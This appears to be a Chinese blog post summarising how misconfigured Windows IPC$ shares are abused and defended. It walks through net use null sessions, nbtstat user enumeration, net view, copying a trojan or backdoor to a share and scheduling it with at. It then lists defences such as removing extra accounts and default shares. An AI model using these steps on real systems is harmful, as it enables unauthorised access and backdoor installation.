windows上IPC配置不当利用以及防护
来源:互联网 发布:nodejs 多个js 编辑:程序博客网 时间:2024/06/02 02:37
主要都是看这篇文章的http://blog.csdn.net/bytxl/article/details/46790995
这里自己总结一下,因为没有环境实战,也没有实战经验,所以就理理思路。
首先,
建立空连接
net use \\ip\ipc$ "" /user:""
或者非空连接
net use \\ip\ipc$ "password" /user:"username"
这里顺便讲一下删除连接
net use \\ip\ipc$ /del
当然建立空连接的时候可以通过某些方法得到用户名和密码,具体我不会做,只知道这个可以获得用户名。
nbtstat -A \\ip
然后查看目标主机上有哪些共享目录
net view \\ip
接着就是往共享目录上上传文件(木马后门),当然你得有写入权限,至于权限的获取我并不会。
copy 要复制的文件及路径 目的路径
最后当然是运行这个文件
获取远程主机的时间
net time \\ip
用at运行刚才上传的文件,运行时间是远程主机的时间
at \\ip 时间 程序名
好吧at命令似乎不支持了,改天再尝试。
防护主要从两个方面,一个是删除多余的账户,另一个是删除默认共享。
删除多余的账户可以参考
http://blog.csdn.net/qq_27607539/article/details/76019992
这个方法。
删除不必要的共享可以用
net share
查看自己有哪些共享,然后用
net share 共享名 /del
删除掉,更狠一点的可以直接禁用server服务:
net stop server /f
阅读全文
0 0
- windows上IPC配置不当利用以及防护
- 【安全牛学习笔记】利用配置不当提权
- Windows上SSH服务器的配置以及客户端的连接
- Windows上SSH服务器的配置以及客户端的连接
- windows上安装python3教程以及环境变量配置
- 配置struts2不当错误
- 中间件漏洞以及防护
- windows上 nginx 配置代理服务,配置多域名,以及最简单实现跨域配置
- 信息泄露之配置不当
- windows上SVN配置
- windows上配置chromedriver
- windows上配置GitHub
- windows上配置pyqgis
- windows上配置eclipse
- SQL注入攻击以及防护
- 小白日记25:kali渗透测试之提权(五)--利用配置不当提权
- windows 3389 端口入侵防护
- windows 3389 端口入侵防护
- python科学计算笔记(二)pandas获取网络文件
- 计算机基础——JAVA位操作
- 虚拟机克隆CentOS6.5之后网卡的配置
- sublime text 3 安装ctags
- Android——Android基础控件
- windows上IPC配置不当利用以及防护
- vim
- android 软键盘的显示与隐藏
- Android 滑动Toolbar透明度变化
- html相关
- spring boot
- 使用ccache加速xcode编译过程
- 暑假集训test10
- POJ-3190 Stall Reservations(贪心)